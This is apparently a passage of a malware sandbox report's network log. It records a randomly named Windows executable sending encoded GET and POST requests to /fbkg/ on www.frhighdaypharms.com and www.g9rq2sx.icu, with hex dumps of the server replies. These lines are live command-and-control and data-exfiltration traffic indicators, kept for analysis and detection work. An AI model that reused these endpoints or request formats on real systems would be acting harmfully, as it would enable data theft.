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
                                                                                                                                                                                                Nov 17, 2023 19:32:10.333405972 CET1382OUTData Raw: 55 53 4b 36 64 75 73 71 34 6f 66 37 4e 56 48 48 59 6e 63 68 77 50 39 79 52 72 36 36 41 56 4c 43 6a 6a 4d 53 57 59 48 70 4d 39 38 4b 52 6b 6c 2b 76 34 76 72 34 37 4f 69 6b 4d 52 52 62 57 56 64 30 4e 36 43 7a 53 79 5a 6b 2b 6a 42 6a 47 48 50 47 68
                                                                                                                                                                                                Data Ascii: USK6dusq4of7NVHHYnchwP9yRr66AVLCjjMSWYHpM98KRkl+v4vr47OikMRRbWVd0N6CzSyZk+jBjGHPGhCyypPvPsMA/MD+j7E6r6WtbzrFqc9e7kT6I7ResDx5KVEaZmT4xnIorApJJaDdHQoSRIb9+Fe+7R6RgM9MFxuA+X1pGp1DFo4+ChGMDZEIpEJfj4MBpdbt4EIfxcpktcDvhpV3UwC4dedH1GJW9NpkQDXkOdgMO/h
                                                                                                                                                                                                Nov 17, 2023 19:32:10.333538055 CET1389OUTData Raw: 71 52 48 4d 47 78 66 6c 77 73 76 75 65 46 66 53 37 76 31 59 33 6a 69 75 5a 59 38 63 5a 43 36 39 4e 6e 78 73 39 2b 57 2f 32 48 73 42 75 42 6f 4b 72 45 43 2b 69 57 31 30 36 55 30 7a 71 2f 37 35 79 75 5a 56 4b 66 59 65 65 5a 33 49 6e 6e 43 74 54 46
                                                                                                                                                                                                Data Ascii: qRHMGxflwsvueFfS7v1Y3jiuZY8cZC69Nnxs9+W/2HsBuBoKrEC+iW106U0zq/75yuZVKfYeeZ3InnCtTF1wTvsinLsEolbbU2nnJ6rkUQMNWCkmfIdbT2itTVoX+s8L+q9SqhokssAPat17zfo7/wuy1m1oCDdr8mJRKU822uWzRskOI+uXG999vQP1qVIq0jQG5/PaYqL+tCrQ9fNdFWR5jz6zKPEwnDJc5DhrXh8OrYPMsB+
                                                                                                                                                                                                Nov 17, 2023 19:32:10.333611012 CET1390OUTData Raw: 4e 71 46 57 55 54 57 34 55 52 52 58 45 4c 39 68 71 33 70 6c 42 6e 56 35 41 75 70 4a 67 37 77 30 39 70 4c 72 52 52 51 50 37 75 7a 4f 48 2b 2b 57 63 73 41 75 79 38 70 53 49 44 77 52 6d 77 43 65 58 46 4c 6f 4d 2b 59 63 55 67 6e 54 6e 51 47 42 66 45
                                                                                                                                                                                                Data Ascii: NqFWUTW4URRXEL9hq3plBnV5AupJg7w09pLrRRQP7uzOH++WcsAuy8pSIDwRmwCeXFLoM+YcUgnTnQGBfEvVcac/1Yo4TySLCJDFrjjc2hP4z7lA/n/Jgx+Q3ue2nS/MLBYux2LFlfxrILSCCQo3MGkvV4ewdsf8bXAtXXfkmsuKwDzTCOdQ22Svt9AaDl+4mFCt9nVhaAYapWx8y4mtq7QLWNfJsB+m4HqgbS6JpN5MPPJJT+S
                                                                                                                                                                                                Nov 17, 2023 19:32:10.333842993 CET1404OUTData Raw: 67 67 73 4c 5a 7a 31 2f 34 43 6d 73 33 78 57 5a 31 69 72 63 37 74 32 4f 50 53 6b 65 6f 59 62 43 46 57 74 43 73 54 4d 7a 4b 42 6a 4e 54 56 62 49 51 77 49 35 77 4a 2f 53 55 46 63 68 34 69 58 4f 49 63 63 36 4e 51 54 62 49 61 4b 6d 47 30 6e 72 44 47
                                                                                                                                                                                                Data Ascii: ggsLZz1/4Cms3xWZ1irc7t2OPSkeoYbCFWtCsTMzKBjNTVbIQwI5wJ/SUFch4iXOIcc6NQTbIaKmG0nrDG3lHcjptxGZFa3Wlv3TzTC7MBwW4ljhV2f6J92ZoRd/y7n7ebnEcmoWJUbSvky4iPL8gGsRP+Dir4HxEga5dm/U8CfMp7Jbvv+1xoYSH0VUFZvJoOt4q9tBC8zRkmNHfBeMka0qdiUjEMz4XPlfHGa/37ngwDZPibk
                                                                                                                                                                                                Nov 17, 2023 19:32:10.503679037 CET1413OUTData Raw: 31 2f 75 50 75 51 49 68 7a 34 66 56 55 4f 49 34 56 35 38 56 30 7a 33 4c 44 54 67 55 77 38 6c 38 5a 32 76 45 68 6a 4d 41 37 64 6d 72 51 63 47 72 63 54 71 6d 75 31 66 59 72 4c 55 66 79 38 6c 58 48 47 47 52 4f 6e 4e 6d 68 4f 55 51 4b 32 65 30 42 7a
                                                                                                                                                                                                Data Ascii: 1/uPuQIhz4fVUOI4V58V0z3LDTgUw8l8Z2vEhjMA7dmrQcGrcTqmu1fYrLUfy8lXHGGROnNmhOUQK2e0BzUrBnsSyEZPDoj43Jdf26xwb6aE8+Q6V8z5EXR0cVe4CKQQoKRUl9F1m9kjB4ixxJfStrPYXCUsPy/1sHI402ZuoIMV4gnZ0puPoBJROv23o90Vjo3TWQkkSc1/FfkwXsXNnYOORIH1EREGoiPP+BQVcYziLtTcfbe
                                                                                                                                                                                                Nov 17, 2023 19:32:10.503804922 CET1416OUTData Raw: 31 79 4d 72 4d 50 48 57 55 64 48 45 35 68 61 63 4c 43 34 35 45 58 46 69 68 4d 6b 34 6a 50 64 6e 76 39 52 48 32 35 33 38 63 7a 71 43 52 78 33 6b 69 6a 53 65 77 41 61 5a 2b 2f 36 38 49 31 37 6d 66 31 2b 41 6e 65 61 57 6c 6b 36 6d 31 78 70 46 76 47
                                                                                                                                                                                                Data Ascii: 1yMrMPHWUdHE5hacLC45EXFihMk4jPdnv9RH2538czqCRx3kijSewAaZ+/68I17mf1+AneaWlk6m1xpFvGBlxbaezmHFvyDXF+aYqnRaQ7uk3CyxsudnRghN0oW4ALlfGo1f6NceIm6hK7i1OSETpGNuNZUWm42NZj51DdnrP+ocGF9mMI/KLSSujxM0wsMOFckPqVXez+tduXiQECJt6LBVurwTetUTO1PfZUHY3PqTapX4YVE
                                                                                                                                                                                                Nov 17, 2023 19:32:10.503860950 CET1419OUTData Raw: 6d 64 74 32 50 36 58 43 7a 6c 2f 2b 50 37 35 6b 6f 49 35 4f 37 59 39 48 46 50 62 79 46 6f 2f 71 5a 6a 70 39 67 75 6b 39 58 42 37 52 56 56 4b 48 4f 69 73 69 56 35 6c 62 6f 71 63 63 55 59 58 2f 4f 38 69 73 46 77 6f 65 4e 71 57 68 4a 54 6d 48 54 55
                                                                                                                                                                                                Data Ascii: mdt2P6XCzl/+P75koI5O7Y9HFPbyFo/qZjp9guk9XB7RVVKHOisiV5lboqccUYX/O8isFwoeNqWhJTmHTUkzPlP6eqrpAnTwM7o+Ri6BAH/BQb/USajvC5WpK4HxsuvMPKWgwOTNwj+fUrUJsGxXrsYqzfRHdmofmammD0v1pqosaBlm/W8oG+RhY9xZmgd1jxtSmxiUkgfFt7netHUhn8ixE1brSzoLOSbgkrBaj0KQBLb0TZw
                                                                                                                                                                                                Nov 17, 2023 19:32:10.675302029 CET1421INHTTP/1.1 404 Not Found
                                                                                                                                                                                                Date: Fri, 17 Nov 2023 18:32:10 GMT
                                                                                                                                                                                                Server: Apache/2.4.57 (codeit) OpenSSL/3.0.10+quic mod_perl/2.0.11 Perl/v5.16.3
                                                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                                                                                                Content-Length: 315
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                71192.168.11.2050198209.182.252.24580C:\Program Files (x86)\bdzDGTMMusXcEiMplCvKoElCHYVZWeSjQVqxAIdFwfubCvNARJRHLelYDoOHj\RvEFtjZJSPYTXuqJXJdvrvwe.exe
                                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                                Nov 17, 2023 19:32:12.848064899 CET1422OUTGET /fbkg/?Nx1L1=526dgl_phJ&T6I=kaJyhKmkPlgtKJtmmBfH2viQGZqK+66G0n0GrQsx6FyEW0DjSTzd6+/fE4wxwFlAMzIoBYsI873pRJak10YM5J9PGBdAXgKtow== HTTP/1.1
                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                Accept-Language: en-US,en
                                                                                                                                                                                                Host: www.frhighdaypharms.com
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                                                                                                                                Nov 17, 2023 19:32:13.018312931 CET1422INHTTP/1.1 404 Not Found
                                                                                                                                                                                                Date: Fri, 17 Nov 2023 18:32:12 GMT
                                                                                                                                                                                                Server: Apache/2.4.57 (codeit) OpenSSL/3.0.10+quic mod_perl/2.0.11 Perl/v5.16.3
                                                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                                                                                                Content-Length: 315
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                71209.182.252.24580192.168.11.2050198C:\Program Files (x86)\bdzDGTMMusXcEiMplCvKoElCHYVZWeSjQVqxAIdFwfubCvNARJRHLelYDoOHj\RvEFtjZJSPYTXuqJXJdvrvwe.exe
                                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                                Nov 17, 2023 19:32:12.848064899 CET1422OUTGET /fbkg/?Nx1L1=526dgl_phJ&T6I=kaJyhKmkPlgtKJtmmBfH2viQGZqK+66G0n0GrQsx6FyEW0DjSTzd6+/fE4wxwFlAMzIoBYsI873pRJak10YM5J9PGBdAXgKtow== HTTP/1.1
                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                Accept-Language: en-US,en
                                                                                                                                                                                                Host: www.frhighdaypharms.com
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                                                                                                                                Nov 17, 2023 19:32:13.018312931 CET1422INHTTP/1.1 404 Not Found
                                                                                                                                                                                                Date: Fri, 17 Nov 2023 18:32:12 GMT
                                                                                                                                                                                                Server: Apache/2.4.57 (codeit) OpenSSL/3.0.10+quic mod_perl/2.0.11 Perl/v5.16.3
                                                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                                                                                                Content-Length: 315
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                72192.168.11.205019938.163.97.880C:\Program Files (x86)\bdzDGTMMusXcEiMplCvKoElCHYVZWeSjQVqxAIdFwfubCvNARJRHLelYDoOHj\RvEFtjZJSPYTXuqJXJdvrvwe.exe
                                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                                Nov 17, 2023 19:32:19.416305065 CET1423OUTPOST /fbkg/ HTTP/1.1
                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                                Accept-Language: en-US,en
                                                                                                                                                                                                Host: www.g9rq2sx.icu
                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Content-Length: 184
                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                Origin: http://www.g9rq2sx.icu
                                                                                                                                                                                                Referer: http://www.g9rq2sx.icu/fbkg/
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                                                                                                                                Data Raw: 54 36 49 3d 43 41 55 2b 33 58 4f 51 55 4c 78 4e 73 74 56 6c 4d 6a 4b 74 43 46 62 56 66 5a 61 58 57 50 50 73 72 79 34 58 52 4e 48 78 48 33 50 66 69 30 76 4d 6e 4c 67 6d 51 2f 73 59 42 66 62 73 57 6f 35 68 42 67 59 61 39 6f 73 43 6b 72 4c 47 46 34 70 5a 2f 39 38 37 37 47 6e 6b 73 35 55 2b 76 72 4c 46 4d 71 38 69 48 57 78 48 68 58 53 52 6c 47 43 43 4f 6a 6c 54 34 4a 47 38 37 5a 50 55 6f 58 72 73 56 56 62 39 5a 76 37 78 73 61 51 39 64 6e 4d 70 68 43 6b 41 47 55 38 37 6b 67 7a 49 49 68 55 33 69 66 58 48 76 6f 4a 44 7a 69 61 50 73 32 75 47 4b 67 3d 3d
                                                                                                                                                                                                Data Ascii: T6I=CAU+3XOQULxNstVlMjKtCFbVfZaXWPPsry4XRNHxH3Pfi0vMnLgmQ/sYBfbsWo5hBgYa9osCkrLGF4pZ/9877Gnks5U+vrLFMq8iHWxHhXSRlGCCOjlT4JG87ZPUoXrsVVb9Zv7xsaQ9dnMphCkAGU87kgzIIhU3ifXHvoJDziaPs2uGKg==
                                                                                                                                                                                                Nov 17, 2023 19:32:22.766515017 CET1424INHTTP/1.1 200 OK
                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                Date: Fri, 17 Nov 2023 18:32:24 GMT
                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                Content-Encoding: gzip
                                                                                                                                                                                                Data Raw: 64 38 0d 0a 1f 8b 08 00 00 00 00 00 00 03 bd 90 cb 0a c2 30 10 45 f7 7e 45 c9 4a c1 24 28 0a 46 5a 41 44 0b 5a 51 b4 d2 a5 94 44 6c fa 48 6b 26 e2 0b ff 5d c1 8a 28 ae 5c b8 18 b8 f7 2e 0e 87 b1 81 6b 59 18 8b 47 a1 86 8d 71 d0 ca 1f e1 0e b2 a4 70 90 d7 5f 0f 66 9e 37 1c f8 c8 02 cd 1d 44 29 88 84 b4 1b 24 0d 69 0c f8 5e 70 a1 73 92 49 45 62 40 3d 9b 3e 60 bd 8a 5d 06 af 4f a4 92 a6 7a 91 a2 8b 26 6c 36 71 8d db 76 8b 71 a0 dd e1 12 d5 79 f2 65 bd d6 5e 9c 27 e8 2f 7a ad f9 71 2a 9a f1 2e 5d 4c 59 b0 48 4a bd cf f5 77 bd c8 98 02 ba 94 66 42 6d 0e 24 07 c0 5c e1 28 57 db e4 7e 24 4c e5 69 af 38 10 9e 67 d4 9c 19 63 ef 3f bd 01 81 7d 56 5b a9 01 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                Data Ascii: d80E~EJ$(FZADZQDlHk&](\.kYGqp_f7D)$i^psIEb@=>`]Oz&l6qvqye^'/zq*.]LYHJwfBm$\(W~$Li8gc?}V[0


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                7238.163.97.880192.168.11.2050199C:\Program Files (x86)\bdzDGTMMusXcEiMplCvKoElCHYVZWeSjQVqxAIdFwfubCvNARJRHLelYDoOHj\RvEFtjZJSPYTXuqJXJdvrvwe.exe
                                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                                Nov 17, 2023 19:32:19.416305065 CET1423OUTPOST /fbkg/ HTTP/1.1
                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                                Accept-Language: en-US,en
                                                                                                                                                                                                Host: www.g9rq2sx.icu
                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Content-Length: 184
                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                Origin: http://www.g9rq2sx.icu
                                                                                                                                                                                                Referer: http://www.g9rq2sx.icu/fbkg/
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                                                                                                                                Data Raw: 54 36 49 3d 43 41 55 2b 33 58 4f 51 55 4c 78 4e 73 74 56 6c 4d 6a 4b 74 43 46 62 56 66 5a 61 58 57 50 50 73 72 79 34 58 52 4e 48 78 48 33 50 66 69 30 76 4d 6e 4c 67 6d 51 2f 73 59 42 66 62 73 57 6f 35 68 42 67 59 61 39 6f 73 43 6b 72 4c 47 46 34 70 5a 2f 39 38 37 37 47 6e 6b 73 35 55 2b 76 72 4c 46 4d 71 38 69 48 57 78 48 68 58 53 52 6c 47 43 43 4f 6a 6c 54 34 4a 47 38 37 5a 50 55 6f 58 72 73 56 56 62 39 5a 76 37 78 73 61 51 39 64 6e 4d 70 68 43 6b 41 47 55 38 37 6b 67 7a 49 49 68 55 33 69 66 58 48 76 6f 4a 44 7a 69 61 50 73 32 75 47 4b 67 3d 3d
                                                                                                                                                                                                Data Ascii: T6I=CAU+3XOQULxNstVlMjKtCFbVfZaXWPPsry4XRNHxH3Pfi0vMnLgmQ/sYBfbsWo5hBgYa9osCkrLGF4pZ/9877Gnks5U+vrLFMq8iHWxHhXSRlGCCOjlT4JG87ZPUoXrsVVb9Zv7xsaQ9dnMphCkAGU87kgzIIhU3ifXHvoJDziaPs2uGKg==
                                                                                                                                                                                                Nov 17, 2023 19:32:22.766515017 CET1424INHTTP/1.1 200 OK
                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                Date: Fri, 17 Nov 2023 18:32:24 GMT
                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                Content-Encoding: gzip
                                                                                                                                                                                                Data Raw: 64 38 0d 0a 1f 8b 08 00 00 00 00 00 00 03 bd 90 cb 0a c2 30 10 45 f7 7e 45 c9 4a c1 24 28 0a 46 5a 41 44 0b 5a 51 b4 d2 a5 94 44 6c fa 48 6b 26 e2 0b ff 5d c1 8a 28 ae 5c b8 18 b8 f7 2e 0e 87 b1 81 6b 59 18 8b 47 a1 86 8d 71 d0 ca 1f e1 0e b2 a4 70 90 d7 5f 0f 66 9e 37 1c f8 c8 02 cd 1d 44 29 88 84 b4 1b 24 0d 69 0c f8 5e 70 a1 73 92 49 45 62 40 3d 9b 3e 60 bd 8a 5d 06 af 4f a4 92 a6 7a 91 a2 8b 26 6c 36 71 8d db 76 8b 71 a0 dd e1 12 d5 79 f2 65 bd d6 5e 9c 27 e8 2f 7a ad f9 71 2a 9a f1 2e 5d 4c 59 b0 48 4a bd cf f5 77 bd c8 98 02 ba 94 66 42 6d 0e 24 07 c0 5c e1 28 57 db e4 7e 24 4c e5 69 af 38 10 9e 67 d4 9c 19 63 ef 3f bd 01 81 7d 56 5b a9 01 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                Data Ascii: d80E~EJ$(FZADZQDlHk&](\.kYGqp_f7D)$i^psIEb@=>`]Oz&l6qvqye^'/zq*.]LYHJwfBm$\(W~$Li8gc?}V[0


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                73192.168.11.205020038.163.97.880C:\Program Files (x86)\bdzDGTMMusXcEiMplCvKoElCHYVZWeSjQVqxAIdFwfubCvNARJRHLelYDoOHj\RvEFtjZJSPYTXuqJXJdvrvwe.exe
                                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                                Nov 17, 2023 19:32:23.330815077 CET1425OUTPOST /fbkg/ HTTP/1.1
                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                                Accept-Language: en-US,en
                                                                                                                                                                                                Host: www.g9rq2sx.icu
                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Content-Length: 524
                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                Origin: http://www.g9rq2sx.icu
